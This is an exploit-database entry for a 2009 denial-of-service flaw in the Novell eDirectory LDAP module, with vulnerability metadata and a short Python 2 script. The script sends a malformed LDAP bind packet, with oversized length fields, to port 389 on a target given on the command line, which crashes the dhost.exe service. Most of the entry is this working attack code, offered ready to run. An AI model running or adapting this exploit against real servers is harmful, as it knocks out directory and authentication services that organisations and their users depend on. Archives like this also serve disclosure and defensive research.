Novell eDirectory 883ftf3 nldap module DOS

vendor:

eDirectory

by:

Matteo Memelli

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: eDirectory

Affected Version From: 883ftf3

Affected Version To: 885

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Novell eDirectory 883ftf3 nldap module DOS

A malformed bind LDAP packet can make dhost.exe service crashing.

Mitigation:

Vendor notification; patched in 885 release

Source

Exploit-DB raw data:

#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed bind LDAP packet can make dhost.exe service crashing.
# 24/03/2009 Vendor notification; patched in 885 release
#

import sys
from socket import *

payload = (
          "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
          "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
          "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
          "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
          "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
          "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
          "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
          "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
          )

s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
print s.recv(1024)
s.close()
print 'Done!'